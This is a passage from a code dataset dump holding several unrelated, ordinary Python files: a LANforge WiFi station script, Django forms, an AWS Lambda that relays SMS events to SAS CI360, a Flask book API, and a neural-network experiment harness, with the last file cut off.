content stringlengths 5 1.05M |
|---|
#!/usr/bin/env python3
import sys
import os
if sys.version_info[0] != 3:
print("This script requires Python 3")
exit(1)
if 'py-json' not in sys.path:
sys.path.append(os.path.join(os.path.abspath('..'), 'py-json'))
import argparse
import LANforge
from LANforge.lfcli_base import LFCliBase
from LANforge import LFUtils
import realm
import time
import pprint
class IPv4Test(LFCliBase):
    """Creates LANforge stations on a given radio/SSID and manages their
    lifecycle (build, admin-up, cleanup)."""

    def __init__(self, host, port, ssid, security, password, sta_list=None,
                 number_template="00000", radio="wiphy0", _debug_on=False,
                 _exit_on_error=False,
                 _exit_on_fail=False):
        super().__init__(host, port, _debug=_debug_on, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
        self.host = host
        self.port = port
        self.ssid = ssid
        self.radio = radio
        self.security = security
        self.password = password
        self.sta_list = sta_list
        self.timeout = 120  # seconds; callers may override (see main())
        self.number_template = number_template
        self.debug = _debug_on
        self.local_realm = realm.Realm(lfclient_host=self.host, lfclient_port=self.port)
        self.station_profile = self.local_realm.new_station_profile()
        self.station_profile.lfclient_url = self.lfclient_url
        self.station_profile.ssid = self.ssid
        # BUG FIX: the original line ended with a stray comma, which made
        # ssid_pass a 1-tuple (self.password,) instead of the password string.
        self.station_profile.ssid_pass = self.password
        self.station_profile.security = self.security
        self.station_profile.number_template_ = self.number_template
        self.station_profile.mode = 0

    def build(self):
        """Create the stations admin-down, then bring them admin-up."""
        # Build stations
        self.station_profile.use_security(self.security, self.ssid, self.password)
        self.station_profile.set_number_template(self.number_template)
        print("Creating stations")
        self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
        # Report port stats every 1.5 s so state changes show up quickly.
        self.station_profile.set_command_param("set_port", "report_timer", 1500)
        self.station_profile.set_command_flag("set_port", "rpt_timer", 1)
        self.station_profile.create(radio=self.radio, sta_names_=self.sta_list, debug=self.debug)
        self.station_profile.admin_up()
        self._pass("PASS: Station build finished")

    def cleanup(self, sta_list):
        """Remove the stations and block until LANforge reports them gone."""
        self.station_profile.cleanup(sta_list)
        LFUtils.wait_until_ports_disappear(base_url=self.lfclient_url, port_list=sta_list,
                                           debug=self.debug)
def main():
    """Parse CLI arguments, build the station name list, and run the test."""
    lfjson_host = "localhost"
    lfjson_port = 8080
    parser = LFCliBase.create_basic_argparse(
        prog='example_wpa_connection.py',
        formatter_class=argparse.RawTextHelpFormatter,
        epilog='''\
Example code that creates a specified amount of stations on a specified SSID using WPA security.
''',
        description='''\
example_wpa_connection.py
--------------------
Generic command example:
python3 ./example_wpa_connection.py \\
--host localhost (optional) \\
--port 8080 (optional) \\
--num_stations 3 \\
--security {open|wep|wpa|wpa2|wpa3} \\
--ssid netgear-wpa \\
--passwd admin123-wpa \\
--debug
Note: multiple --radio switches may be entered up to the number of radios available:
--radio wiphy0 <stations> <ssid> <ssid password> --radio <radio 01> <number of last station> <ssid> <ssid password>
''')
    parser.add_argument('--test_duration', help='--test_duration sets the duration of the test', default="5m")
    parser.add_argument('--url', help='--url specifies upload/download, address, and dest', default="dl http://10.40.0.1 /dev/null")
    args = parser.parse_args()

    # Default to two stations unless a positive count was supplied.
    station_count = 2
    if (args.num_stations is not None) and (int(args.num_stations) > 0):
        station_count = int(args.num_stations)

    station_list = LFUtils.portNameSeries(prefix_="sta",
                                          start_id_=0,
                                          end_id_=station_count - 1,
                                          padding_number_=10000,
                                          radio=args.radio)
    ip_test = IPv4Test(lfjson_host, lfjson_port, ssid=args.ssid, password=args.passwd, radio=args.radio,
                       security=args.security, sta_list=station_list)
    # Clear any leftover stations from a previous run before building anew.
    ip_test.cleanup(station_list)
    ip_test.timeout = 60
    ip_test.build()


if __name__ == "__main__":
    main()
|
# Copyright 2018 Eddie Schoute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Quippy is a parser library for parsing Quipper ASCII quantum circuit descriptions."""
from quippy.parser import quipper_parser as parser
from quippy.transformer import Wire, Control, TypeAssignment_Type, TypeAssignment, Gate, QGate_Op, \
    QGate, QRot_Op, QRot, QInit, CInit, QTerm, CTerm, QMeas, QDiscard, CDiscard, SubroutineCall, \
    Comment, Circuit, Subroutine_Control, Subroutine, Start

# BUG FIX: __all__ must contain *strings* naming the public API, not the
# objects themselves -- a non-string entry makes `from quippy import *`
# raise TypeError during star-import.
__all__ = ["parser", "Wire", "Control", "TypeAssignment_Type", "TypeAssignment",
           "Gate", "QGate_Op", "QGate", "QRot_Op", "QRot", "QInit", "CInit",
           "QTerm", "CTerm", "QMeas", "QDiscard", "CDiscard", "SubroutineCall",
           "Comment", "Circuit", "Subroutine_Control", "Subroutine", "Start"]
|
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
"""
Creates the system platform package.
"""
from __future__ import absolute_import
from rez.package_maker import make_package
from rez.vendor.version.version import Version
from rez.bind._utils import check_version
from rez.system import system
def bind(path, version_range=None, opts=None, parser=None):
    """Create the `platform` system package under *path* and return the
    installed variants."""
    platform_version = Version(system.platform)
    check_version(platform_version, version_range)
    with make_package("platform", path) as pkg:
        pkg.version = platform_version
    # make_package finalizes on context exit; installed_variants is then set.
    return pkg.installed_variants
|
from django.forms import ModelForm
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from .models import Profile, Project, Rating
class CreateUserForm(UserCreationForm):
    """Registration form for Django's built-in User model."""
    class Meta:
        model = User
        fields = ['username', 'email', 'password1', 'password2']
class ProfileForm(ModelForm):
    """Form for editing a user's Profile (all model fields except `user`)."""
    class Meta:
        model = Profile
        # BUG FIX: the original had `field = '__all__'` (typo for `fields`),
        # which Django silently ignored; `exclude` alone already yields all
        # fields except `user`, so the dead attribute is removed.
        exclude = ['user']
class NewProjectForm(ModelForm):
    """Form for creating a Project; `user` is set by the view, not the form."""
    class Meta:
        model = Project
        exclude = ['user']
class NewRatingForm(ModelForm):
    """Form for rating a project; `user` and `project` are set by the view."""
    class Meta:
        model = Rating
        exclude = ['user', 'project']
"""
Copyright © 2021, SAS Institute Inc., Cary, NC, USA. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import os
import json
import urllib3
import boto3
from botocore.exceptions import ClientError
print("Initializing function")
# Get the service resource
dynamodb = boto3.resource('dynamodb')
# Initialize global variables -- read once per Lambda cold start; a missing
# variable raises KeyError here, failing fast on misconfiguration.
db_cache_identities_table = os.environ['db_cache_identities_table']  # DynamoDB table mapping phone -> identity
scg_mo_event = os.environ["scg_mo_event"]  # CI360 event name for inbound (MO) messages
sm_secret_id_prefix = os.environ['sm_secret_id_prefix']  # Secrets Manager id prefix; tenant id is appended
scg_mo_body_uppercase = os.environ["scg_mo_body_uppercase"].lower() == 'true'  # env string -> bool
identity_field = os.environ['identity_field']  # CI360 identity attribute name ("" disables phone-based identity)
default_tenant_id = os.environ['tenant_id']  # fallback tenant when none is cached/encoded
# In-memory per-container cache of Secrets Manager lookups, keyed by tenant.
secret_cache = {}
"""
lambda_handler:
Main event handler entry point for lambda request
"""
def lambda_handler(event, context):
    """Route an SCG webhook event to MO-message or status processing.

    Always returns HTTP 200 so the upstream webhook does not retry.
    """
    # Use .get() so a request with no "body" key is treated like an empty
    # body instead of raising KeyError (the original indexed event["body"]).
    if event is not None and event.get("body") is not None:
        event_body = json.loads(event["body"])
        #print(event_body)
        event_type = event_body["event"]["evt-tp"]
        print("event_type:", event_type)
        # check if MO message or status update
        if event_type == "mo_message_received":
            process_mo_message(event_body)
        else:
            process_status_message(event_body)
    else:
        print('no event body')
    return {
        'statusCode': 200,
        'body': json.dumps('OK')
    }
"""
process_mo_message:
Inbound (MO) message processing logic
"""
def process_mo_message(event_body):
    # Extract sender and message body from the SCG event payload, then
    # forward an external event to CI360 for the matching identity.
    fld_list = event_body["event"]["fld-val-list"]
    # parse out required values
    #msg_id = fld_list["message_id"]
    #to_address = fld_list["to_address"]
    from_address = fld_list["from_address"]
    msg_body = fld_list["message_body"]
    # check if message_body is JSON for RCS reply
    try:
        msg_json = json.loads(msg_body)
    except ValueError as e:
        print("simple message body - not JSON")
        # uppercase message body if configured
        if scg_mo_body_uppercase:
            msg_body = fld_list["message_body"].upper()
    else:
        print("JSON message body:", msg_json)
        # RCS suggested replies carry the user's selection in postbackData.
        msg_body = msg_json["postbackData"]
    # determine inbound channel (default = SMS)
    channel = "SMS"
    sender_id = fld_list["sender_id_id"]
    # hardcoded sender_id for WhatsApp demo
    if sender_id == "LhvA6oXM43cXBlFiozlmG4":
        channel = "WhatsApp"
    # get datahub_id and tenant from cache based on phone
    datahub_id, tenant_id = get_cached_identity(from_address)
    if tenant_id is None:
        print("No tenant_id in cache, using default tenant_id:", default_tenant_id)
        tenant_id = default_tenant_id
    print("datahub_id:", datahub_id, "tenant_id:", tenant_id)
    # An empty identity_field means we can only address the contact by a
    # cached datahub_id; otherwise the phone number itself is the identity.
    if identity_field.strip() == "":
        if datahub_id is not None:
            msg_data = { "eventName": scg_mo_event, "datahub_id": datahub_id, "message_body": msg_body }
            call_ci360_api(msg_data, tenant_id)
        else:
            print("no cached identity found and no identity field")
    else:
        msg_data = { "eventName": scg_mo_event, identity_field: from_address, "message_body": msg_body }
        call_ci360_api(msg_data, tenant_id)
"""
process_status_message:
Message status update processing logic
"""
def process_status_message(event_body):
    # Translate a delivery-status update into a CI360 external event.
    msg_data = {}
    fld_list = event_body["event"]["fld-val-list"]
    # parse out required values
    msg_id = fld_list["message_id"]
    to_address = fld_list["to_address"]
    from_address = fld_list["from_address"]
    new_state = fld_list["new_state"]
    print("msg_id:", msg_id, "new_state:", new_state)
    # parse out external message id; format is "datahub_id|externalCode[|tenant_id]"
    ext_msg_id = fld_list["external_message_request_id"]
    id_parts = ext_msg_id.split("|")
    tenant_id = None
    if len(id_parts) >= 2:
        msg_data["datahub_id"] = id_parts[0]
        msg_data["externalCode"] = id_parts[1]
        if len(id_parts) >= 3:
            tenant_id = id_parts[2]
    if tenant_id is None:
        print("No tenant_id in external_id, using default tenant_id:", default_tenant_id)
        tenant_id = default_tenant_id
    # translate new_state to external 360 event; states without a configured
    # env mapping (scg_response_event_<state>) are intentionally skipped.
    try:
        msg_data["eventName"] = os.environ["scg_response_event_" + new_state]
        call_ci360_api(msg_data, tenant_id)
    except KeyError as e:
        print("No event defined for state", new_state)
"""
call_ci360_api:
Method calls CI360 Event API to inject external event
"""
def call_ci360_api(msg_data, tenant_id):
    # Resolve the tenant's credentials first; bail out if unavailable.
    secret = get_secret(tenant_id)
    if secret is None:
        print("Could not get secret (API keys)")
        return
    # call api
    print("CI360 event msg_data:", msg_data)
    payload = json.dumps(msg_data).encode('utf-8')
    headers = { "Authorization": "Bearer " + secret['ci360_token'], 'Content-Type': 'application/json' }
    pool = urllib3.PoolManager()
    resp = pool.request('POST', secret['ci360_api_url'], body = payload, headers = headers)
    print("Response Status:", resp.status, "Body:", resp.data)
"""
get_cached_identity:
Retrieve identity from cache (DynamoDB table) based on message recipient/sender
"""
def get_cached_identity(from_addr):
    """Look up *from_addr* in the DynamoDB identity cache.

    Returns a (datahub_id, tenant_id) tuple; either element is None when
    not cached or on a database error.
    """
    print("Reading identity data from cache")
    # read data from cache
    table = dynamodb.Table(db_cache_identities_table)
    try:
        db_item = table.get_item(Key={'phone': from_addr})
    except ClientError as e:
        print(e.response['Error']['Message'])
        # BUG FIX: the original returned a bare None here, but the caller
        # unpacks two values (datahub_id, tenant_id) -- a DB error would
        # have raised TypeError instead of degrading gracefully.
        return None, None
    else:
        #print(response)
        datahub_id = None
        tenant_id = None
        try:
            # 'Item' is absent when the key is not present in the table.
            datahub_id = db_item['Item']['datahub_id']
            tenant_id = db_item['Item']['tenant_id']
        except KeyError:
            print("no item returned from cache")
        return datahub_id, tenant_id
"""
get_secret
Retrieve Secret from cache or SecretsManager containing API tokens
"""
def get_secret(tenant_id):
    # Serve from the per-container cache when possible; note that a failed
    # fetch (None) is also cached, matching the original behavior.
    if tenant_id in secret_cache:
        secret = secret_cache[tenant_id]
        print("secret found in cache")
        #print("secret:", secret)
    else:
        print(f"secret not found in cache, fetching for tenant: {tenant_id}")
        secret = fetch_secret(tenant_id)
        secret_cache[tenant_id] = secret
    return secret
"""
get_secret
Retrieve Secret from SecretsManager containing API tokens (used when secret not found in cache)
"""
def fetch_secret(tenant_id):
    # Fetch per-tenant API credentials from AWS Secrets Manager. Returns the
    # parsed secret dict, or None on failure (ClientError falls through to
    # an implicit `return None`; so does a response without SecretString).
    # Get secrets
    session = boto3.session.Session()
    # NOTE(review): region is hard-coded to us-east-1 -- confirm this is
    # intentional rather than derived from the Lambda's own region.
    client = session.client(service_name='secretsmanager', region_name="us-east-1")
    try:
        secret_id = sm_secret_id_prefix + tenant_id
        get_secret_value_response = client.get_secret_value(SecretId=secret_id)
    except ClientError as e:
        print("Failed to get secrets: ", e.response)
        #raise e
    else:
        if 'SecretString' in get_secret_value_response:
            secret = json.loads(get_secret_value_response['SecretString'])
            #print(secret)
            return secret
        else:
            print("No SecretString found")
            return None
|
#!/usr/bin/python3
# -*- encoding=utf8 -*-
from uuid import uuid4
import flask
from flask import Flask
from flask import request
from flask import abort
from flask_basicauth import BasicAuth
app = Flask(__name__)
# Hard-coded BasicAuth credentials -- test fixture only; never reuse in
# production.
app.config['BASIC_AUTH_USERNAME'] = 'test_user'
app.config['BASIC_AUTH_PASSWORD'] = 'test_password'
basic_auth = BasicAuth(app)
# In-memory stores: the book list and the set of issued session cookies.
# Both reset on process restart.
BOOKS = []
SESSIONS = []
class InvalidUsage(Exception):
    """Raised when a request does not carry a valid auth cookie."""
    # HTTP status code associated with this error.
    status_code = 400
def verify_cookie(req):
    """Return True when the request carries a cookie of an active session."""
    presented = req.cookies.get('my_cookie', '')
    return presented in SESSIONS
@app.route('/login', methods=['GET'])
@basic_auth.required
def get_auth():
    """ This function verifies user and password and creates
    new cookie if user and password are correct.
    """
    # BasicAuth has already validated credentials by the time we get here;
    # mint a fresh session cookie and remember it.
    cookie = str(uuid4())
    SESSIONS.append(cookie)
    return flask.jsonify({'auth_cookie': cookie})
@app.route('/books', methods=['GET'])
def get_list_of_books():
    """Return the list of books, optionally sorted and limited.

    Query parameters:
        sort  -- 'by_title' sorts the result by title
        limit -- positive integer truncates the result
    """
    global BOOKS
    if verify_cookie(request):
        sort_filter = request.args.get('sort', '')
        list_limit = int(request.args.get('limit', -1))
        result = BOOKS
        if sort_filter == 'by_title':
            result = sorted(result, key=lambda x: x['title'])
        if list_limit > 0:
            result = result[:list_limit]
        # BUG FIX: previously returned the raw BOOKS list, silently
        # discarding the sort/limit computed above.
        return flask.jsonify(result)
    raise InvalidUsage('No valid auth cookie provided!')
@app.route('/books/<book_id>', methods=['GET'])
def get_book(book_id):
    """Return a single book by id; an empty object when no match exists."""
    if not verify_cookie(request):
        raise InvalidUsage('No valid auth cookie provided!')
    found = {}
    # Scan the whole list; the last matching entry wins, as in the original.
    for entry in BOOKS:
        if entry['id'] == book_id:
            found = entry
    return flask.jsonify(found)
@app.route('/books/<book_id>', methods=['PUT'])
def update_book(book_id):
    """ This function updates information about some book. """
    if verify_cookie(request):
        for i, book in enumerate(BOOKS):
            # Find the book with this ID:
            if book['id'] == book_id:
                # Missing form values keep the existing title/author.
                book['title'] = request.values.get('title', book['title'])
                book['author'] = request.values.get('author', book['author'])
                # Update information about this book:
                BOOKS[i] = book
                return flask.jsonify(book)
        # No book with this id was found.
        abort(404)
    raise InvalidUsage('No valid auth cookie provided!')
@app.route('/books/<book_id>', methods=['DELETE'])
def delete_book(book_id):
    """Delete the book with the given id from the list."""
    global BOOKS
    if not verify_cookie(request):
        raise InvalidUsage('No valid auth cookie provided!')
    # Rebuild the list, dropping every entry with the targeted id.
    BOOKS = [item for item in BOOKS if item['id'] != book_id]
    return flask.jsonify({'deleted': book_id})
@app.route('/add_book', methods=['POST'])
def add_book():
    """Append a new book built from the request's form values."""
    global BOOKS
    if not verify_cookie(request):
        raise InvalidUsage('No valid auth cookie provided!')
    record = {
        'id': str(uuid4()),
        'title': request.values.get('title', ''),
        'author': request.values.get('author', 'No Name'),
    }
    # add new book to the list:
    BOOKS.append(record)
    return flask.jsonify(record)
if __name__ == "__main__":
    # Development server: listen on all interfaces, port 7000.
    app.run('0.0.0.0', port=7000)
"""Abstract descriptions of a network analyzer.
"""
import base64
import csv
import io
import os
import pickle
import shutil
import tarfile
import numpy as np
from PIL import Image
import imageio
from pysyrenn import Network
from syrenn_proto import syrenn_pb2 as syrenn_pb
class Experiment:
    """Abstract class describing a network experiment.

    Subclasses implement run() and analyze(); this base class manages the
    results directory, tar archiving, CSV helpers, and the artifact store.
    """
    def __init__(self, directory_name):
        """Initializes a new experiment.

        Creates an output directory, removing any existing files in that
        location. Also initializes a new artifacts_csv file which holds a list
        of all the artifacts written to using the "record_artifact" interface.
        """
        # Create a directory outside of bazel-bin for storing the results.
        global_dir = os.environ["BUILD_WORKING_DIRECTORY"]
        self.directory = "{}/experiments/results/{}".format(
            global_dir, directory_name)
        shutil.rmtree(self.directory, ignore_errors=True)
        os.makedirs(self.directory, exist_ok=True)
        self.tar_name = "%s.exp.tgz" % self.directory
        self.open_files = []
        self.artifacts = None
        self.artifacts_csv = self.begin_csv("artifacts", ["key", "type", "path"])

    def close(self, tar=True, nicely=True):
        """Ends the experiment, freeing open file pointers.

        @tar determines whether the experiment directory should be tarred into
        an archive. In general, this is done after the initial experiments and
        then once more if the analysis produces any new files.
        @nicely should indicate whether the closing is expected or not. For
        example, if the program errors in the middle of an experiment, it is
        not "nice." nicely=False will leave the experiment directory alone
        (i.e. untarred and unremoved).
        """
        for open_file in self.open_files:
            open_file.close()
        self.open_files = []
        if tar and nicely:
            # tar directory into directory.exp.tar
            with tarfile.open(self.tar_name, "w:gz") as archive:
                for name in os.listdir(self.directory):
                    archive.add("%s/%s" % (self.directory, name), arcname=name)
        if nicely:
            shutil.rmtree(self.directory, ignore_errors=True)

    def open(self):
        """Reads experiment data from a previous run.

        In general, this is called after run() and close(), or when doing an
        analyze-only execution of previous experimental results.
        """
        # Create the extraction directory.
        shutil.rmtree(self.directory, ignore_errors=True)
        os.mkdir(self.directory)
        # Extract the tar file. NOTE(review): extractall trusts the archive's
        # member paths; archives are produced locally by close(), so this is
        # acceptable here, but do not point it at untrusted archives.
        with tarfile.open(self.tar_name, "r:*") as archive:
            archive.extractall(self.directory)
        self.artifacts = self.read_csv("artifacts")
        # Re-open and re-fill the CSV file so we can keep writing to it.
        self.artifacts_csv = self.begin_csv("artifacts", ["key", "type", "path"])
        # TODO(masotoud): look into a way to open the file for appending.
        # instead of truncating + re-adding.
        for artifact in self.artifacts:
            self.write_csv(self.artifacts_csv, artifact)

    def has_archive(self):
        """True if the experiment seems to have already been run.
        """
        return os.path.exists(self.tar_name)

    def remove_archive(self):
        """Removes an existing archive.
        """
        return os.remove(self.tar_name)

    def __del__(self):
        """Close file handles in case of unexpected exit.

        Normal exits should call .close(nicely=True).
        """
        # Guard: if __init__ raised before attributes were set, close() would
        # itself raise AttributeError during interpreter teardown.
        if hasattr(self, "open_files"):
            self.close(nicely=False)

    @staticmethod
    def image_to_datauri(image):
        """Converts a Numpy array holding an image to a data representation.

        Useful for embedding images in SVG files. See:
        https://stackoverflow.com/questions/46598607
        """
        image = Image.fromarray(image.astype("uint8"))
        raw_bytes = io.BytesIO()
        image.save(raw_bytes, "PNG")
        raw_bytes.seek(0)
        image = base64.b64encode(raw_bytes.read()).decode()
        return "data:image/png;base64,{}".format(image)

    @staticmethod
    def load_network(network_name, maxify_acas=True):
        """Loads an experiment network given by @network_name.

        Currently supports models of the form:
        - acas_#_# (ACAS Xu models translated from the ReluPlex format)
        - {cifar10,mnist}_relu_#_# (fully-connected ReLU models from ERAN)
        - {cifar10,mnist}_relu_conv{small,medium,big}{_diffai,_pgd}
          (convolutional ReLU models from ERAN).
        And should be referenced in BUILD rule experiments:models.
        maxify_acas controlls whether the ACAS model is "cleaned" before
        returned; cleaning removes the unnecessary ReLU layer at the end as
        well as inverts the outputs so the recommended action becomes the
        maximal score.
        """
        if "acas_" in network_name:
            _, i, j = network_name.split("_")
            network = Network.from_file("models/acas_models/%s_%s.eran"
                                        % (i, j))
            if maxify_acas:
                # We remove ReLU layers from the end of the model as they don't
                # actually change the classification (when one exists).
                # BUG FIX: the original asserted on the *list*
                # network.layers[:-1], which never has a "weights" attribute,
                # making the check vacuous. The intent is that the layer being
                # dropped is not a weight layer.
                assert not hasattr(network.layers[-1], "weights")
                network.layers = network.layers[:-1]
                # ACAS Xu networks use the minimal score as the class instead
                # of the more-standard maximum score; this inverts the last
                # layer so the minimal score becomes the max.
                network.layers[-1].weights *= -1.0
                network.layers[-1].biases *= -1.0
            return network
        if "vrl_" in network_name:
            _, model_name = network_name.split("_", 1)
            return Network.from_file("models/vrl/eran/%s.eran" % model_name)
        return Network.from_file(
            "external/%s_model/file/model.eran" % (network_name))

    @staticmethod
    def load_input_data(name_or_path, is_eran_conv_model=False):
        """Gets a dataset and/or its metadata.

        Currently supports three datasets:
        - acas (empty dataset which returns preprocessing info for ACAS)
        - cifar10_test (100 test images from ERAN)
        - mnist_test (100 test images from ERAN)
        Returns a dictionary with four items:
        - process(np_array) will process a raw (uint8) Numpy array image into a
          format that can be passed to the Network.
        - reset(np_array) will invert process(...). This may not always be
          possible if process(...) is non-invertible, but it should at least
          work on all valid images (i.e., uint8 pixel values).
        - raw_inputs holds (flattened) uint8 Numpy arrays for each input image.
        - labels holds the corresponding label for each input image.
        """
        if name_or_path == "acas":
            mins = np.array([0.0, -3.141593, -3.141593, 100.0, 0.0])
            maxes = np.array([60760.0, 3.141593, 3.141593, 1200.0, 1200.0])
            means = np.array([1.9791091e+04, 0.0, 0.0, 650.0, 600.0])
            std_deviations = np.array([60261.0, 6.28318530718, 6.28318530718,
                                       1100.0, 1200.0])
            return {
                "process": lambda i: ((np.clip(i, mins, maxes) - means) / std_deviations),
                "reset": lambda i: ((i * std_deviations) + means),
                "raw_inputs": [],
                "labels": [],
            }
        inputs_file_path = "external/%s_data/file/data.csv" % name_or_path
        # ERAN models
        with open(inputs_file_path, "r", newline="") as inputs_file:
            csv_inputs = csv.reader(inputs_file)
            input_data = np.array(list(csv_inputs)).astype(np.float64)
        # TODO(masotoud): handle this more robustly.
        process_input = lambda i: i / 255.0
        reset_input = lambda i: np.round(i * 255.0)
        if "cifar10" in name_or_path and not is_eran_conv_model:
            # The "conv" ERAN models correspond to .pyt files, which are
            # normalized *in the model itself* (see:
            # https://github.com/eth-sri/eran/blob/df4d1cf4556c0ad4ba062cbfda9a645449f8096e/tf_verify/__main__.py
            # line 254 and 263 -- the normalize() call for Pytorch models
            # corresponds to a NormalizeLayer that we pass to the transformer
            # server)
            process_input = lambda i: (i / 255.0) - 0.5
            reset_input = lambda i: np.round((i + 0.5) * 255.0)
        return {
            "process": process_input,
            "reset": reset_input,
            "raw_inputs": input_data[:, 1:],
            # BUG FIX: np.int was deprecated in NumPy 1.20 and removed in
            # 1.24; the builtin int is the documented replacement.
            "labels": input_data[:, 0].astype(int),
        }

    @staticmethod
    def rgbify_image(image):
        """Converts a flattened uint8 image array into a HWC, RGB one.

        This method *ASSUMES* the dataset is either CIFAR10 or MNIST.
        """
        shape_to_use = (-1,)
        if image.size == 28 * 28:
            # We assume this is a B/W MNIST image
            shape_to_use = (28, 28)
        elif image.size == (32 * 32 * 3):
            # We assume this is an RGB CIFAR10 32x32 image
            shape_to_use = (32, 32, 3)
        image = np.reshape(image, shape_to_use).astype(np.uint8)
        if len(shape_to_use) == 2:
            # https://stackoverflow.com/questions/32171917
            image = np.repeat(image[:, :, np.newaxis], 3, axis=2)
        return image

    def begin_csv(self, filename, column_labels, extrasaction="raise"):
        """Opens a new CSV file with the given column labels for writing.

        Returns a tuple (file_handle, csv_writer) that can be passed to
        write_csv. These do not need to be manually flushed or closed --- that
        is handled by Experiment.close() and Experiment.write_csv().
        @filename should be a path-safe identifier for the CSV file (extension
        and path not necessary).
        @column_labels should be a list of (string) column labels. These will
        correspond to dictionary keys in write_csv and read_csv.
        """
        dirname = os.path.dirname(filename)
        self.artifact_directory(dirname)  # Ensure the directory exists
        csv_file = open("%s/%s.csv" % (self.directory, filename), "w",
                        newline="")
        csv_writer = csv.DictWriter(csv_file, column_labels,
                                    extrasaction=extrasaction)
        csv_writer.writeheader()
        self.open_files.append(csv_file)
        return (csv_file, csv_writer)

    @staticmethod
    def write_csv(csv_data, record):
        """Writes a record to a CSV file opened with Experiment.begin_csv(...).

        @csv_data should be the tuple returned by Experiment.begin_csv(...)
        @record should be a dictionary with keys corresponding to the
        @column_labels passed to Experiment.begin_csv(...)
        """
        csv_data[1].writerow(record)
        # Flush eagerly so partial results survive a crash.
        csv_data[0].flush()

    def read_csv(self, filename):
        """Fully reads a CSV file and returns a list of the rows.

        Each row is represented by a dictionary with keys corresponding to the
        columns. Dictionary values are strings --- parsing them to a usable
        format is left to the caller.
        """
        filename = "%s/%s.csv" % (self.directory, filename)
        with open(filename, "r", newline="") as csv_file:
            csv_reader = csv.DictReader(csv_file)
            data = []
            for record in csv_reader:
                data.append(dict(record))
        return data

    def artifact_directory(self, dir_key):
        """Creates a directory that will be included in the experiment archive.

        Returns its path without trailing /.
        """
        name = "%s/%s" % (self.directory, dir_key)
        os.makedirs(name, exist_ok=True)
        return name

    def record_artifact(self, artifact, key, artifact_type):
        """Record a high-level artifact from the experiment.

        Each Experiment instance has a corresponding "artifact store" which
        allows one to easily record, store, and later reference artifacts
        produced during the experiment. This method adds an artifact @artifact
        to that store, using key @key under the assumption that the artifact
        should be treated as type @artifact_type.
        """
        filename = "%s/%s" % (self.directory, key)
        file_directory = os.path.dirname(filename)
        if artifact_type != "rawpath" and not os.path.exists(file_directory):
            # See notes on a possible race condition in the answer here:
            # https://stackoverflow.com/questions/10149263
            os.makedirs(file_directory)

        def write_pb(path, pb_serialized):
            """Writes @pb_serialized to @path.
            """
            with open(path, "wb") as to_file:
                to_file.write(pb_serialized.SerializeToString())

        if artifact_type == "rgb_image":
            filename += ".png"
            imageio.imwrite(filename, artifact)
        elif artifact_type == "np_array":
            filename += ".npy"
            np.save(filename, artifact)
        elif artifact_type == "pickle":
            filename += ".pickle"
            with open(filename, "wb") as to_file:
                pickle.dump(artifact, to_file)
        elif artifact_type == "matplotlib":
            filename += ".pdf"
            artifact.savefig(filename)
        elif artifact_type == "network":
            # BUG FIX: the original used `artifact_type in "network"`, which
            # is a substring test and would also match e.g. "net", "work",
            # or "" -- the intended comparison is equality.
            filename += ".pb"
            write_pb(filename, artifact.serialize())
        elif artifact_type == "svg":
            filename += ".svg"
            artifact.saveas(filename)
        elif artifact_type == "rawpath":
            filename = artifact
        elif artifact_type == "csv":
            filename = artifact
        elif artifact_type == "text":
            with open(filename, "w") as to_file:
                to_file.write(artifact)
        else:
            raise NotImplementedError
        record = {"key": key, "type": artifact_type, "path": filename}
        self.write_csv(self.artifacts_csv, record)
        if self.artifacts is not None:
            self.artifacts.append(record)

    def read_artifact(self, key):
        """Reads an artifact from the loaded artifact store indexed by @key.

        Experiment.open() *MUST* be called before using read_artifact(...).
        This method is intended to be used only by the analyze() method (not
        run, which should be calling record_artifact).
        """
        assert self.artifacts is not None
        try:
            artifact = next(artifact for artifact in self.artifacts
                            if artifact["key"] == key)
        except StopIteration:
            # Include the missing key in the error for easier debugging
            # (the original raised a bare KeyError).
            raise KeyError(key) from None

        def read_pb(path, pb_type):
            """Deserializes protobuf data stored to a file.

            @path is the file path, @pb_type is the Protobuf descriptor to
            parse as.
            """
            with open(path, "rb") as from_file:
                string_rep = from_file.read()
            serialized = pb_type()
            serialized.ParseFromString(string_rep)
            return serialized

        if artifact["type"] == "rgb_image":
            return imageio.imread(artifact["path"])
        if artifact["type"] == "np_array":
            return np.load(artifact["path"], allow_pickle=True)
        if artifact["type"] == "pickle":
            with open(artifact["path"], "rb") as from_file:
                return pickle.load(from_file)
        if artifact["type"] == "rawpath":
            return artifact["path"]
        if artifact["type"] == "csv":
            return self.read_csv(artifact["path"])
        if artifact["type"] == "network":
            return Network.deserialize(
                read_pb(artifact["path"], syrenn_pb.Network))
        raise NotImplementedError

    @staticmethod
    def summarize(data):
        """Returns a string summarizing the contents of @data.

        @data should be a one-dimensional Numpy array.
        """
        return "Mean: %lf, Std: %lf, Mdn: %lf, 25%%: %lf, 75%%: %lf" % (
            np.mean(data),
            np.std(data),
            np.median(data),
            np.percentile(data, 25.0),
            np.percentile(data, 75.0))

    def run(self):
        """Runs the analysis on the network and inputs.
        """
        raise NotImplementedError

    def analyze(self):
        """Performs analysis and summarization after a run().

        Experiment.read_artifact(key) should be used to recover data from the
        experiment.
        """
        raise NotImplementedError

    def main(self):
        """Main experiment harness.
        """
        run = not self.has_archive()
        if not run:
            print("It seems that this experiment has already been run.")
            choice = input("[R]e-run, [A]nalyze-only, or [D]elete and re-run? ").lower()[0]
            assert choice in {"r", "a", "d"}
            if choice == "d":
                self.remove_archive()
            run = choice in {"r", "d"}
        if run:
            self.run()
            self.close()
        self.open()
        did_modify = self.analyze()
        self.close(tar=did_modify)
|
import numpy as np
from time import time
from helpers.simulator.sim_bots import *
import math
import os
import matplotlib.pyplot as plt
class MarketGenerator(object):
    """Simulates market prices with a geometric-Brownian-motion style model."""

    def __init__(self):
        self.market_path = "helpers/simulator/market_sim"
        self.s0 = None        # initial price
